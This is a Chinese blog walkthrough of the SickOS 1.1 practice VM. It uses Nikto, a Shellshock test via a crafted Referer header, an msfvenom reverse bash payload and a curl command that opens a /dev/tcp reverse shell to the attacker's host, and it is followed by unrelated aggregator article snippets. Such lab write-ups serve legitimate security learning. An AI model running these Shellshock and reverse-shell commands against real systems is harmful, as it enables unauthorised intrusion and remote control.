七七高7777
七七高7777

靶机渗透之SICKOS: 1.1(解法2)

SICKOS: 1.1

  • 靶机渗透
    • 测试是否存在shellshock
    • 构造payload
    • 获取bash权限
    • 切换shell
    • 构造pythonpayload,放置到py定时任务中
    • 开始监听py文件

靶机渗透

sudo nikto -h 192.168.133.139 -useproxy http://192.168.133.139:3128
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.133.139
+ Target Hostname:    192.168.133.139
+ Target Port:        80
+ Proxy:              192.168.133.139:3128
+ Start Time:         2023-07-13 21:03:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Retrieved via header: 1.0 localhost (squid/3.1.19).
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec  4 19:35:02 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ : Server banner changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19'.
+ /: Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /cgi-bin/status: Uncommon header '93e4r0-cve-2014-6278' found, with contents: true.
+ /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.

/cgi-bin/status: Site appears vulnerable to the ‘shellshock’ vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

测试是否存在shellshock

sudo curl -v --proxy http://192.168.133.139:3128 http://192.168.133.139/cgi-bin/status -H "Referer:() {  test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"
*   Trying 192.168.133.139:3128...
* Connected to 192.168.133.139 (192.168.133.139) port 3128 (#0)
> GET http://192.168.133.139/cgi-bin/status HTTP/1.1
> Host: 192.168.133.139
> User-Agent: curl/7.88.1
> Accept: */*
> Proxy-Connection: Keep-Alive
> Referer:() {  test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit
> 
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Date: Fri, 14 Jul 2023 01:12:37 GMT
< Server: Apache/2.2.22 (Ubuntu)
< Vary: Accept-Encoding
< Content-Type: text/plain
< X-Cache: MISS from localhost
< X-Cache-Lookup: MISS from localhost:3128
< Via: 1.0 localhost (squid/3.1.19)
< Connection: close
< 

uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Closing connection 0

出现uid=33(www-data) gid=33(www-data) groups=33(www-data),表面有shellshock漏洞

构造payload

sudo msfvenom -p cmd/unix/reverse_bash lhost=192.168.133.137 lport=443 -f raw
[sudo] password for kali: 
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 78 bytes
bash -c '0<&157-;exec 157<>/dev/tcp/192.168.133.137/443;sh <&157 >&157 2>&157'

获取bash权限

$ sudo curl -v --proxy http://192.168.133.139:3128 http://192.168.133.139/cgi-bin/status -H "Referer:() {  test;}; 0<&157-;exec 157<>/dev/tcp/192.168.133.137/443;/bin/bash <&157 >&157 2>&157"
*   Trying 192.168.133.139:3128...
* Connected to 192.168.133.139 (192.168.133.139) port 3128 (#0)
> GET http://192.168.133.139/cgi-bin/status HTTP/1.1
> Host: 192.168.133.139
> User-Agent: curl/7.88.1
> Accept: */*
> Proxy-Connection: Keep-Alive
> Referer:() {  test;}; 0<&157-;exec 157<>/dev/tcp/192.168.133.137/443;/bin/bash <&157 >&157 2>&157
>

靶机渗透之SICKOS: 1.1(解法2)_第1张图片

切换shell

在这里插入图片描述

构造pythonpayload,放置到py定时任务中

靶机渗透之SICKOS: 1.1(解法2)_第2张图片
靶机渗透之SICKOS: 1.1(解法2)_第3张图片

开始监听py文件

靶机渗透之SICKOS: 1.1(解法2)_第4张图片
靶机渗透之SICKOS: 1.1(解法2)_第5张图片
成功获取flag!

你可能感兴趣的:(靶机渗透,web安全,网络安全,php,安全,github)

  • 多年行业深耕,黄山谷捷具备多重竞争优势 L913197600 黄山谷捷科技
    在车规级功率半导体市场中,产品的可靠性、一致性、安全性、稳定性和长效性至关重要,它们直接影响着汽车的安全性和功能性。特别是在散热基板这一关键领域,其作为功率模块的核心散热功能结构和重要组成部件,直接关系到汽车电机控制器的可靠性和电驱动系统的性能。因此,散热基板供应商的选择对于汽车功率半导体厂商而言,不仅是技术层面的考量,更是对品质和信誉的严格筛选。在这个背景下,黄山谷捷股份有限公司(下称:黄山谷捷
  • 对于低空经济热度不减,未来飞行汽车会成为新型出行方式吗 视记闻言 汽车
    随着科技的发展,飞行汽车也逐渐成为一种新型出行方式。例如,沃飞长空AE200飞行汽车,它是一种以电力为动力来源,并具备垂直起降功能的飞行器,具有智能操作、快捷机动、低成本、低噪音、零排放、易维护、高安全等特点。这种飞行汽车可以在未来满足商务人士或政府领导人点对点的接送服务,或者两百公里的城际出行需求。
  • 周边生态 | WAL-G 与 DBeaver 新版增加 Cloudberry 支持 数据库
    ApacheCloudberry™(Incubating)是Apache软件基金会孵化项目,由Greenplum和PostgreSQL衍生而来,作为领先的开源MPP数据库,可用于建设企业级数据仓库,并适用于大规模分析和AI/ML工作负载。GitHub:https://github.com/apache/cloudberryHi社区小伙伴们!我们很高兴与大家分享两个ApacheCloudberry开
  • Java中BigDecimal怎样取反
    Java中BigDecimal.negate()方法深度解析(专业版)核心原理说明表特性技术说明不可变性原对象保持不变,返回新对象精度保持保留原始数值的所有精度信息线程安全所有操作均通过创建新对象完成,天然线程安全运算效率比基本类型运算稍慢,但可保证精确计算专业代码演示(增强版)importjava.math.BigDecimal;importjava.math.RoundingMode;publ
  • 分享一个学习Ollama的开源项目,轻松上手大模型部署 可可南木 机器学习人工智能
    最近deepseek火得不行,很多人都想在家里部署一个来玩一下,所以到处找资源学习。机缘巧合下搜到了这个项目,内容相当给力,不敢私藏,分享出来给需要的同学。项目地址:https://github.com/datawhalechina/handy-ollamalink在线阅读:https://datawhalechina.github.io/handy-ollama/link效果预览:感谢所有对该项
  • 【面试指南】golang-map注意事项 梦里是谁N 面试golang职场和发展
    map非并发安全的众所周知,go基础类型中的map是非并发安全的,多个goroutine同时对同一个map进行读写操作时,可能会导致并发写问题,packagemainimport("fmt")funcmain(){m:=make(map[string]string)gofunc(){m["a"]="a"}()m["a"]="a1"fmt.Println(m["a"])}我们可以使用gorun-ra
  • selenium浏览器下载汇总 gallonyin RPAselenium测试工具
    chromedriver官网:https://googlechromelabs.github.io/chrome-for-testing/下载chromewin64位:https://storage.googleapis.com/chrome-for-testing-public/131.0.6778.85/win64/chrome-win64.zip下载chromedriverwin64位:ht
  • C++ 书籍分享:带你畅游编程世界 七七知享 开发书库c++开发语言pythonjavac语言javascriptqt
    在C++编程的浩瀚海洋中,挑选合适的学习书籍至关重要。今天就给大家分享几本极具价值的C++书籍。提高C++性能的编程技术.左飞深度探索C++对象模型C和C++安全编码(中文版).Robert.C.SeacordC++编程艺术C++编程规范-101条规则准则与最佳实践无论你是刚踏入编程领域的新手,还是寻求技术突破的进阶者,这些书籍都能为你在C++学习之路上提供有力的支持,助你不断提升编程水平。C++
  • [ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) _PowerShell [靶场实战]vulhubvulhub漏洞复现ApacheSolr远程命令执行CVE-2017-12629渗透测试
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2017-12629-RCE环境2、启动C
  • [ vulhub漏洞复现篇 ] Apche log4j远程代码执行漏洞(CVE-2021-44228) _PowerShell [靶场实战]vulhubCVE-2021-44228远程代码执行漏洞Apchelog4j渗透测试
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响版本三、漏洞描述四、环境搭建1.进入CVE-2021-44228环境2.启动CVE-2
  • rocketmq-bashboard部署 ldlly0505 rocketmqjavaspring开发语言
    下载rocketmq可视化界面,源码地址:https://github.com/apache/rocketmq-dashboard修改application.yml配置文件端口为8089和namesrvAddrs,打包直接部署,结果拉取依赖报错,大概意思是maven-antrun-plugin仓库找不到,pom文件的maven-antrun-plugin这里改下:org.apache.maven.
  • Post与Get的区别与优劣 挣扎与觉醒中的技术人 httpweb安全安全学习网络
    POST和GET是HTTP协议中最常用的两种请求方法,它们在用途、数据传递方式、安全性等方面存在显著差异。以下是对它们的详细对比和优劣分析:1.核心区别特性GETPOST主要用途获取数据(如查询、搜索)提交数据(如表单提交、文件上传)数据位置URL参数(?key=value)请求体(Body)可见性参数暴露在URL和浏览器历史中数据在请求体中,不可见(但可通过开发者工具查看)数据长度限制受URL长
  • Java 中的泛型讲解与使用(超全详解) C_V_Better javajava后端算法数据结构开发语言
    Java中的泛型(超全详解)在Java编程中,泛型是一种强大的特性,它允许我们编写可以处理多种数据类型的代码,从而提高代码的复用性和安全性。本文将对Java中的泛型进行超全详解,包括泛型的基本概念、基本用法、通配符、泛型方法、类型擦除以及实际应用示例,帮助你全面掌握泛型的使用。一、泛型的基本概念1.什么是泛型?泛型是JavaSE5引入的一种特性,它允许我们在编译时指定类型参数,从而避免在运行时进行
  • 无缝监控、精准管控:镜像视界矩阵视频融合技术打造安全隧道未来 云栖道人 安全人工智能大数据
    ——浙江镜像视界科技有限公司发布最新交通安全智能管控解决方案[杭州,2025年2月27日]——交通安全管理迎来革命性突破!浙江镜像视界科技有限公司(以下简称“镜像视界”)正式发布自主研发的矩阵式视频融合技术,这一创新科技将赋能隧道安全检测与交通管控,为全球智能交通建设提供更高效、更精准的解决方案。科技突破:矩阵式视频融合助力隧道安全升级隧道作为现代交通体系的重要组成部分,因其封闭性和特殊环境,对安
  • 数据中心场地设施管理规范—构建安全高效的数字基础设施 数据中心运维高级工程师 安全大数据运维云计算人工智能
    引言:数据中心场地设施管理作为数据中心运营的重要组成部分,涵盖了从基础设施建设到日常运维的全方位工作。其管理质量直接关系到数据中心的可用性、可靠性和经济性。本文将全面探讨数据中心场地设施管理的重要性、目标、适用范围、遵循标准、组织架构及职责、场地设施分类与功能,以及管理要求,旨在为数据中心管理者提供一份实用的管理指南。一、目的数据中心场地设施管理的核心目的是确保数据中心的高效、稳定运行,同时优化资
  • PubSubJS的基本使用 SarinaDu reactreactpubsub
    前言日常积累,欢迎指正参考PubSubJS-GitHubPubSubJS-npm使用说明首先说明我当前使用的pubsub版本为1.6.0什么是pubsub?PubSubJSisatopic-basedpublish/subscribelibrarywritteninJavaScript.即一个利用JavaScript进行发布/订阅的库使用React+TypeScript发布importPubsub
  • 数据安全_笔记系列09_人工智能(AI)与机器学习(ML)在数据安全中的深度应用 宁宁可可 数据安全数据安全
    数据安全_笔记系列09_人工智能(AI)与机器学习(ML)在数据安全中的深度应用人工智能与机器学习技术通过自动化、智能化的数据分析,显著提升了数据分类、威胁检测的精度与效率,尤其在处理非结构化数据、复杂威胁场景和降低误报/漏报率方面表现突出。以下从技术原理、应用场景、实施流程、工具与案例展开解析:一、AI/ML如何提升数据安全能力?1.核心价值复杂数据识别:解析非结构化数据(文本、图像、音视频)中
  • 简易图书管理系统——MYsql+Javase+JDBC callJJ MYsql知识集合javasqldatabasemysqlgithubide
    目录前言数据表的建立操作包各个类的实现增加类删除类展示类借阅与归还类前言书接上文JDBC编程的学习——MYsql版本-CSDN博客本期我们通过对先前图书管理系统进行改造,是它的数据能保存在数据库中完整代码我已经保存在github中,能不能给个星呢!!!!calljsh/MyJava(github.com)这是先前的图书管理系统,这篇博客里面也有完整代码图书管理系统(java)代码展示和思路介绍(9
  • 模式识别课程设计:人脸识别 背景与问题引入之问题描述 XLYcmy 模式识别网络安全人工智能课程设计模式识别人脸识别PCALLM
    1.2问题描述通过之前的背景介绍可以知道人脸识别技术作为计算机视觉和模式识别领域的重要研究方向,已广泛应用于身份验证、安全监控、智能家居等多个领域。随着计算机硬件性能的不断提升和深度学习技术的成熟,人脸识别的精度和应用场景不断扩展。本研究设计了一种基于主成分分析(PCA)[7]和K-L变换的人脸识别系统,利用ORL人脸数据库作为数据源,对输入的人脸图像进行识别,并输出与其特征最相似的人脸。该系统的
  • 汽车行业大数据应用的主要方向 数据科学智慧 大数据
    汽车行业大数据应用的主要方向随着技术的不断发展和智能化的浪潮,大数据在汽车行业中的应用越来越广泛。下面将介绍汽车行业大数据应用的主要方向,并提供相关的源代码示例。智能驾驶与自动驾驶大数据在智能驾驶与自动驾驶技术中起着重要的作用。通过收集和分析大量的车载传感器数据、地图数据、交通状况数据等,可以实现实时的环境感知、路径规划和决策,从而提高驾驶安全性和效率。以下是一个简单的示例代码,展示了如何使用大数
  • Window下安装pyenv Dino Fong 其他pythonvirtualenv
    pyenv-win是pyenvforwin的版本,github地址:https://github.com/pyenv-win/pyenv-win安装方法也很简单,官网的Readme.md的Quickstart就有:Invoke-WebRequest-UseBasicParsing-Uri"https://raw.githubusercontent.com/pyenv-win/pyenv-win/m
  • 2025年CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽安全-黑客4148 网络安全web安全linux密码学CTF
    目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15天)4.3、后期五、CTF学习资源5.1、CTF赛题复现平台5.
  • FFmpeg+vvenc实现H.266的视频编解码教程 ICUD ffmpegh.266视频编解码人工智能
    Linux系统:FFmpeg+vvenc实现H.266的视频编解码教程(视频压缩)关键网址ffmpeg目前支持libvvenc,因此配置好libvvenc只会在一些make、sudomakeinstall命令时遇到问题,例如默认安装或配置路径指定错误、ffmpeg版本、vvenc版本匹配等问题。但无论哪些问题,几乎都可以在以下链接中找到相应的答案:https://github.com/fraunh
  • Go语言学习笔记——类型转换工具库cast PPPsych Go精进学习golang
    文章目录Golang类型转换工具库cast简介快速入门安装使用高级转换时间和时长转换时间类型的转换字符串转换为时间时长类型的转换转换为切片ToIntSliceEToStringSliceE转为`map[string]Type`类型Golang类型转换工具库cast简介cast可以在Go中轻松安全地从一种类型转换为另一种类型,cast提供了简单的函数来轻松地将数字转换为字符串,将接口转换为布尔值等。
  • 麒麟系统远程桌面,麒麟系统如何连接远程桌面? 浅若清风217 编辑器
    在信息技术快速发展的今天,远程桌面连接已成为日常工作和生活中不可或缺的一部分。麒麟操作系统作为一款国产操作系统,其安全性和易用性受到了广泛的认可。对于需要在麒麟系统之间或与其他操作系统之间进行远程桌面连接的用户来说,了解如何设置和连接是非常重要的。本文将为您提供麒麟系统连接远程桌面的详细步骤,帮助您高效、安全地实现远程操作。下面为大家介绍IIS7服务器管理工具的使用教程。一、服务管理器工具的添加方
  • Xftp 文件传输效率倍增术:私藏秘籍,打造极速文件传输通道! 清水白石008 开发环境开发语言学习笔记macos
    Xftp文件传输效率倍增术:私藏秘籍,打造极速文件传输通道!在日常的软件开发、系统管理以及数据处理工作中,文件传输是不可或缺的环节。而Xftp,作为一款强大而专业的SFTP、FTP文件传输客户端,凭借其卓越的性能、丰富的功能和友好的用户界面,成为了无数专业人士的首选。你是否还在为文件传输速度慢、操作繁琐、安全性低而烦恼?你是否渴望掌握Xftp的高级技巧,大幅提升文件传输效率,让工作事半功倍?今天,
  • 指纹识别系统架构 mickey0380 生物识别系统架构人工智能指纹识别模式识别
    目录1.系统架构1.1指纹采集模块1.2指纹处理模块1.3指纹登记模块1.4指纹识别模块1.5指纹识别决策模块1.6管理模块1.6.1存储管理1.6.2传输管理1.6.3安全管理1.7应用开放功能1.7.1指纹登记功能1.7.2指纹验证功能1.7.3指纹辨识功能2.工作流程2.1指纹登记2.2指纹验证2.3指纹辨识3.系统安全3.1系统内在限制3.2系统外部攻击1.系统架构《GB∕T37076-2
  • git 国内源 heeheeai git
    gitconfig--globalurl.“https://hub.fastgit.xyz/”.insteadOf“https://github.com/”gitconfig--globalurl.“https://hub.fastgit.xyz/”.insteadOf“git://github.com/”取消FastGit代理:gitconfig--global--unseturl.“https
  • 软件测试管理岗位职责与方法 霍格沃兹测试开发学社测试人社区 软件测试测试开发
    软件测试管理岗位的主要职责是确保软件质量,通过有效的测试策略和流程,发现并解决潜在问题。以下是该岗位的主要职责和工作方法:主要职责测试计划制定:根据项目需求,制定详细的测试计划,明确测试范围、资源、时间表和工具。测试用例设计:编写测试用例,覆盖功能、性能、安全等各方面,确保全面验证软件。测试执行:组织团队执行测试,记录结果并跟踪缺陷,确保问题及时解决。缺陷管理:使用缺陷跟踪工具记录、分类和跟踪问题
  • 大语言模型(LLM)入门学习路线图,附资源汇总,收藏这篇就够了 AI小白熊 语言模型学习人工智能aitransformer深度学习
    Github项目上有一个[大语言模型学习路线笔记]“大语言模型学习路线笔记”),它全面涵盖了大语言模型的所需的基础知识学习,LLM前沿算法和架构,以及如何将大语言模型进行工程化实践。这份资料是初学者或有一定基础的开发/算法人员入门活深入大型语言模型学习的优秀参考。这份资料重点介绍了我们应该掌握哪些核心知识,并推荐了一系列优质的学习视频和博客,旨在帮助大家系统性地掌握大型语言模型的相关技术。大语言模
  • 开发者关心的那些事 圣子足道 ios游戏编程apple支付
    我要在app里添加IAP,必须要注册自己的产品标识符(product identifiers)。产品标识符是什么? 产品标识符(Product Identifiers)是一串字符串,它用来识别你在应用内贩卖的每件商品。App Store用产品标识符来检索产品信息,标识符只能包含大小写字母(A-Z)、数字(0-9)、下划线(-)、以及圆点(.)。你可以任意排列这些元素,但我们建议你创建标识符时使用
  • 负载均衡器技术Nginx和F5的优缺点对比 bijian1013 nginxF5
            对于数据流量过大的网络中,往往单一设备无法承担,需要多台设备进行数据分流,而负载均衡器就是用来将数据分流到多台设备的一个转发器。         目前有许多不同的负载均衡技术用以满足不同的应用需求,如软/硬件负载均衡、本地/全局负载均衡、更高
  • LeetCode[Math] - #9 Palindrome Number Cwind javaAlgorithm题解LeetCodeMath
    原题链接:#9 Palindrome Number   要求: 判断一个整数是否是回文数,不要使用额外的存储空间   难度:简单   分析: 题目限制不允许使用额外的存储空间应指不允许使用O(n)的内存空间,O(1)的内存用于存储中间结果是可以接受的。于是考虑将该整型数反转,然后与原数字进行比较。 注:没有看到有关负数是否可以是回文数的明确结论,例如
  • 画图板的基本实现 15700786134 画图板
     要实现画图板的基本功能,除了在qq登陆界面中用到的组件和方法外,还需要添加鼠标监听器,和接口实现。 首先,需要显示一个JFrame界面: public class DrameFrame extends JFrame {              //显示
  • linux的ps命令 被触发 linux
    Linux中的ps命令是Process Status的缩写。ps命令用来列出系统中当前运行的那些进程。ps命令列出的是当前那些进程的快照,就是执行ps命令的那个时刻的那些进程,如果想要动态的显示进程信息,就可以使用top命令。 要对进程进行监测和控制,首先必须要了解当前进程的情况,也就是需要查看当前进程,而 ps 命令就是最基本同时也是非常强大的进程查看命令。使用该命令可以确定有哪些进程正在运行
  • Android 音乐播放器 下一曲 连续跳几首歌 肆无忌惮_ android
    最近在写安卓音乐播放器的时候遇到个问题。在MediaPlayer播放结束时会回调 player.setOnCompletionListener(new OnCompletionListener() { @Override public void onCompletion(MediaPlayer mp) { mp.reset(); Log.i("H
  • java导出txt文件的例子 知了ing javaservlet
    代码很简单就一个servlet,如下: package com.eastcom.servlet; import java.io.BufferedOutputStream; import java.io.IOException; import java.net.URLEncoder; import java.sql.Connection; import java.sql.Resu
  • Scala stack试玩, 提高第三方依赖下载速度 矮蛋蛋 scalasbt
    原文地址: http://segmentfault.com/a/1190000002894524 sbt下载速度实在是惨不忍睹, 需要做些配置优化 下载typesafe离线包, 保存为ivy本地库 wget http://downloads.typesafe.com/typesafe-activator/1.3.4/typesafe-activator-1.3.4.zip 解压r
  • phantomjs安装(linux,附带环境变量设置) ,以及casperjs安装。 alleni123 linuxspider
    1. 首先从官网 http://phantomjs.org/下载phantomjs压缩包,解压缩到/root/phantomjs文件夹。 2. 安装依赖 sudo yum install fontconfig freetype libfreetype.so.6 libfontconfig.so.1 libstdc++.so.6 3. 配置环境变量 vi /etc/profil
  • JAVA IO FileInputStream和FileOutputStream,字节流的打包输出 百合不是茶 java核心思想JAVA IO操作字节流
    在程序设计语言中,数据的保存是基本,如果某程序语言不能保存数据那么该语言是不可能存在的,JAVA是当今最流行的面向对象设计语言之一,在保存数据中也有自己独特的一面,字节流和字符流 1,字节流是由字节构成的,字符流是由字符构成的 字节流和字符流都是继承的InputStream和OutPutStream ,java中两种最基本的就是字节流和字符流   类 FileInputStream
  • Spring基础实例(依赖注入和控制反转) bijian1013 spring
    前提条件:在http://www.springsource.org/download网站上下载Spring框架,并将spring.jar、log4j-1.2.15.jar、commons-logging.jar加载至工程1.武器接口 package com.bijian.spring.base3; public interface Weapon { void kil
  • HR看重的十大技能 bijian1013 提升能力HR成长
        一个人掌握何种技能取决于他的兴趣、能力和聪明程度,也取决于他所能支配的资源以及制定的事业目标,拥有过硬技能的人有更多的工作机会。但是,由于经济发展前景不确定,掌握对你的事业有所帮助的技能显得尤为重要。以下是最受雇主欢迎的十种技能。   一、解决问题的能力   每天,我们都要在生活和工作中解决一些综合性的问题。那些能够发现问题、解决问题并迅速作出有效决
  • 【Thrift一】Thrift编译安装 bit1129 thrift
    什么是Thrift The Apache Thrift software framework, for scalable cross-language services development, combines a software stack with a code generation engine to build services that work efficiently and s
  • 【Avro三】Hadoop MapReduce读写Avro文件 bit1129 mapreduce
    Avro是Doug Cutting(此人绝对是神一般的存在)牵头开发的。 开发之初就是围绕着完善Hadoop生态系统的数据处理而开展的(使用Avro作为Hadoop MapReduce需要处理数据序列化和反序列化的场景),因此Hadoop MapReduce集成Avro也就是自然而然的事情。 这个例子是一个简单的Hadoop MapReduce读取Avro格式的源文件进行计数统计,然后将计算结果
  • nginx定制500,502,503,504页面 ronin47 nginx 错误显示
    server { listen 80; error_page 500/500.html; error_page 502/502.html; error_page 503/503.html; error_page 504/504.html; location /test {return502;}} 配置很简单,和配
  • java-1.二叉查找树转为双向链表 bylijinnan 二叉查找树
    import java.util.ArrayList; import java.util.List; public class BSTreeToLinkedList { /* 把二元查找树转变成排序的双向链表 题目: 输入一棵二元查找树,将该二元查找树转换成一个排序的双向链表。 要求不能创建任何新的结点,只调整指针的指向。 10 / \ 6 14 / \
  • Netty源码学习-HTTP-tunnel bylijinnan javanetty
    Netty关于HTTP tunnel的说明: http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/socket/http/package-summary.html#package_description 这个说明有点太简略了 一个完整的例子在这里: https://github.com/bylijinnan
  • JSONUtil.serialize(map)和JSON.toJSONString(map)的区别 coder_xpf jqueryjsonmapval()
     JSONUtil.serialize(map)和JSON.toJSONString(map)的区别   数据库查询出来的map有一个字段为空   通过System.out.println()输出 JSONUtil.serialize(map): {"one":"1","two":"nul
  • Hibernate缓存总结 cuishikuan 开源sshjavawebhibernate缓存三大框架
    一、为什么要用Hibernate缓存? Hibernate是一个持久层框架,经常访问物理数据库。 为了降低应用程序对物理数据源访问的频次,从而提高应用程序的运行性能。 缓存内的数据是对物理数据源中的数据的复制,应用程序在运行时从缓存读写数据,在特定的时刻或事件会同步缓存和物理数据源的数据。   二、Hibernate缓存原理是怎样的? Hibernate缓存包括两大类:Hib
  • CentOs6 dalan_123 centos
    首先su - 切换到root下面1、首先要先安装GCC GCC-C++ Openssl等以来模块:yum -y install make gcc gcc-c++ kernel-devel m4 ncurses-devel openssl-devel2、再安装ncurses模块yum -y install ncurses-develyum install ncurses-devel3、下载Erang
  • 10款用 jquery 实现滚动条至页面底端自动加载数据效果 dcj3sjt126com JavaScript
      无限滚动自动翻页可以说是web2.0时代的一项堪称伟大的技术,它让我们在浏览页面的时候只需要把滚动条拉到网页底部就能自动显示下一页的结果,改变了一直以来只能通过点击下一页来翻页这种常规做法。 无限滚动自动翻页技术的鼻祖是微博的先驱:推特(twitter),后来必应图片搜索、谷歌图片搜索、google reader、箱包批发网等纷纷抄袭了这一项技术,于是靠滚动浏览器滚动条
  • ImageButton去边框&Button或者ImageButton的背景透明 dcj3sjt126com imagebutton
    在ImageButton中载入图片后,很多人会觉得有图片周围的白边会影响到美观,其实解决这个问题有两种方法 一种方法是将ImageButton的背景改为所需要的图片。如:android:background="@drawable/XXX" 第二种方法就是将ImageButton背景改为透明,这个方法更常用 在XML里;    <ImageBut
  • JSP之c:foreach eksliang jspforearch
    原文出自:http://www.cnblogs.com/draem0507/archive/2012/09/24/2699745.html <c:forEach>标签用于通用数据循环,它有以下属性 属 性 描 述 是否必须 缺省值 items 进行循环的项目 否 无 begin 开始条件 否 0 end 结束条件 否 集合中的最后一个项目 step 步长 否 1
  • Android实现主动连接蓝牙耳机 gqdy365 android
    在Android程序中可以实现自动扫描蓝牙、配对蓝牙、建立数据通道。蓝牙分不同类型,这篇文字只讨论如何与蓝牙耳机连接。 大致可以分三步: 一、扫描蓝牙设备: 1、注册并监听广播: BluetoothAdapter.ACTION_DISCOVERY_STARTED BluetoothDevice.ACTION_FOUND BluetoothAdapter.ACTION_DIS
  • android学习轨迹之四:org.json.JSONException: No value for hyz301 json
    org.json.JSONException: No value for items  在JSON解析中会遇到一种错误,很常见的错误   06-21 12:19:08.714 2098-2127/com.jikexueyuan.secret I/System.out﹕ Result:{"status":1,"page":1,&
  • 干货分享:从零开始学编程 系列汇总 justjavac 编程
    程序员总爱重新发明轮子,于是做了要给轮子汇总。 从零开始写个编译器吧系列 (知乎专栏) 从零开始写一个简单的操作系统 (伯乐在线) 从零开始写JavaScript框架 (图灵社区) 从零开始写jQuery框架 (蓝色理想 ) 从零开始nodejs系列文章 (粉丝日志) 从零开始编写网络游戏 
  • jquery-autocomplete 使用手册 macroli jqueryAjax脚本
    jquery-autocomplete学习 一、用前必备 官方网站:http://bassistance.de/jquery-plugins/jquery-plugin-autocomplete/ 当前版本:1.1 需要JQuery版本:1.2.6 二、使用 <script src="./jquery-1.3.2.js" type="text/ja
  • PLSQL-Developer或者Navicat等工具连接远程oracle数据库的详细配置以及数据库编码的修改 超声波 oracleplsql
      在服务器上将Oracle安装好之后接下来要做的就是通过本地机器来远程连接服务器端的oracle数据库,常用的客户端连接工具就是PLSQL-Developer或者Navicat这些工具了。刚开始也是各种报错,什么TNS:no listener;TNS:lost connection;TNS:target hosts...花了一天的时间终于让PLSQL-Developer和Navicat等这些客户
  • 数据仓库数据模型之:极限存储--历史拉链表 superlxw1234 极限存储数据仓库数据模型拉链历史表
    在数据仓库的数据模型设计过程中,经常会遇到这样的需求: 1. 数据量比较大; 2. 表中的部分字段会被update,如用户的地址,产品的描述信息,订单的状态等等; 3. 需要查看某一个时间点或者时间段的历史快照信息,比如,查看某一个订单在历史某一个时间点的状态,    比如,查看某一个用户在过去某一段时间内,更新过几次等等; 4. 变化的比例和频率不是很大,比如,总共有10
  • 10点睛Spring MVC4.1-全局异常处理 wiselyman spring mvc
    10.1 全局异常处理 使用@ControllerAdvice注解来实现全局异常处理; 使用@ControllerAdvice的属性缩小处理范围 10.2 演示 演示控制器 package com.wisely.web; import org.springframework.stereotype.Controller; import org.spring
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他